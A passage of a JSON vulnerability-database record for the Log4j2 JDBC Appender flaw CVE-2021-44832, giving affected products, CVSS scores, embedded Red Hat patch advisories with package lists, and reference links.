"version": "12.0.0.4.6"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.3.2"
},
{
"_id": null,
"model": "log4j",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "2.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.12.4"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0.0"
},
{
"_id": null,
"model": "communications offline mediation controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.5.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-44832"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165636"
},
{
"db": "PACKETSTORM",
"id": "166673"
},
{
"db": "PACKETSTORM",
"id": "166676"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "165711"
},
{
"db": "PACKETSTORM",
"id": "165652"
},
{
"db": "PACKETSTORM",
"id": "165651"
},
{
"db": "PACKETSTORM",
"id": "165564"
}
],
"trust": 0.8
},
"cve": "CVE-2021-44832",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-44832",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-408213",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.7,
"id": "CVE-2021-44832",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-44832",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-408213",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-408213"
},
{
"db": "NVD",
"id": "CVE-2021-44832"
}
]
},
"description": {
"_id": null,
"data": "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. Apache Log4j is a Java-based open source logging tool of the Apache Foundation. Apache Log4j2 2.0-beta7 to 2.17.0 versions have a security vulnerability, which stems from the lack of effective protection and filtering for JDBC Appender and JNDI in the software. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update\nAdvisory ID: RHSA-2022:1297-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1297\nIssue date: 2022-04-11\nCVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 \n CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 \n CVE-2022-23307 \n=====================================================================\n\n1. Summary:\n\nA security update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.4 for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.4.4 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* log4j: SQL injection in Log4j 1.x when application is configured to use\nJDBCAppender (CVE-2022-23305)\n\n* log4j: Unsafe deserialization flaw in Chainsaw log viewer\n(CVE-2022-23307)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSAppender (CVE-2021-4104)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and\ncontext lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data\ncontains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured\nto use JMSSink (CVE-2022-23302)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender\n2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)\n2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink\n2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender\n2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7\nJBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1\nJBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034\nJBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17)\nJBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console\nJBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001\nJBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001\nJBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8\nJBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002\nJBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001\nJBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001\nJBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001\nJBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001\nJBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002\nJBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final\nJBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final\nJBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001\nJBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final\nJBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001\nJBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26\nJBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001\nJBEAP-23323 - [GSS](7.4.z) WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend\nJBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\nJBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001\nJBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002\n\n7. Package List:\n\nRed Hat JBoss EAP 7.4 for RHEL 8:\n\nSource:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm\n\nnoarch:\neap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm\neap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm\neap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm\neap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm\neap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm\neap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm\neap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm\neap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm\n\nx86_64:\neap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\neap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-4104\nhttps://access.redhat.com/security/cve/CVE-2021-44832\nhttps://access.redhat.com/security/cve/CVE-2021-45046\nhttps://access.redhat.com/security/cve/CVE-2021-45105\nhttps://access.redhat.com/security/cve/CVE-2022-23302\nhttps://access.redhat.com/security/cve/CVE-2022-23305\nhttps://access.redhat.com/security/cve/CVE-2022-23307\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK\nHU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K\nkhbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ\nrZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo\nP1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e\nsPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R\nIwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt\nl3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0\nU8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp\nzhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca\ndcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe\nUnHI/WwB37w=\n=eCh2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor OpenShift Container Platform 3.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/3.11/upgrading/index.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2089 - resourceVersion is overflowing type Integer causing ES rejection [openshift-logging 5.0]\n\n6. Description:\n\nRed Hat AMQ Streams, based on the Apache Kafka project, offers a\ndistributed backbone that allows microservices and other applications to\nshare data with extremely high throughput and extremely low latency. \n\nSecurity Fix(es):\n\n* jetty: crafted URIs allow bypassing security constraints (CVE-2021-34429)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for\ndecompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may\nbuffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\n* Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients\n(CVE-2021-38153)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1985223 - CVE-2021-34429 jetty: crafted URIs allow bypassing security constraints\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients\n2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-44832"
},
{
"db": "VULHUB",
"id": "VHN-408213"
},
{
"db": "PACKETSTORM",
"id": "165636"
},
{
"db": "PACKETSTORM",
"id": "166673"
},
{
"db": "PACKETSTORM",
"id": "166676"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "165711"
},
{
"db": "PACKETSTORM",
"id": "165652"
},
{
"db": "PACKETSTORM",
"id": "165651"
},
{
"db": "PACKETSTORM",
"id": "165564"
}
],
"trust": 1.71
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-44832",
"trust": 1.9
},
{
"db": "SIEMENS",
"id": "SSA-784507",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/12/28/1",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "165652",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165651",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165564",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165636",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165711",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165516",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165653",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166020",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165637",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166022",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165750",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165927",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165649",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165659",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165650",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165645",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165632",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2743",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-408213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166673",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166676",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166677",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-408213"
},
{
"db": "PACKETSTORM",
"id": "165636"
},
{
"db": "PACKETSTORM",
"id": "166673"
},
{
"db": "PACKETSTORM",
"id": "166676"
},
{
"db": "PACKETSTORM",
"id": "166677"
},
{
"db": "PACKETSTORM",
"id": "165711"
},
{
"db": "PACKETSTORM",
"id": "165652"
},
{
"db": "PACKETSTORM",
"id": "165651"
},
{
"db": "PACKETSTORM",
"id": "165564"
},
{
"db": "NVD",
"id": "CVE-2021-44832"
}
]
},
"id": "VAR-202112-2011",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-408213"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:17:09.540000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
},
{
"problemtype": "CWE-74",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-408213"
},
{
"db": "NVD",
"id": "CVE-2021-44832"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.1,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220104-0001/"
},
{
"trust": 1.1,
"url": "https://issues.apache.org/jira/browse/log4j2-3293"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2021/12/28/1"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/evv25fxl4fu5x6x5bsl7rlq7t6f65mra/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t57mpjuw3ma6qgwzrtmchhmmpqnvkgfc/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2021-44832"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44832"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-45046"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45105"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-45105"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45046"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23307"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23302"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23305"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4104"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23302"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23305"
},
{
"trust": 0.3,
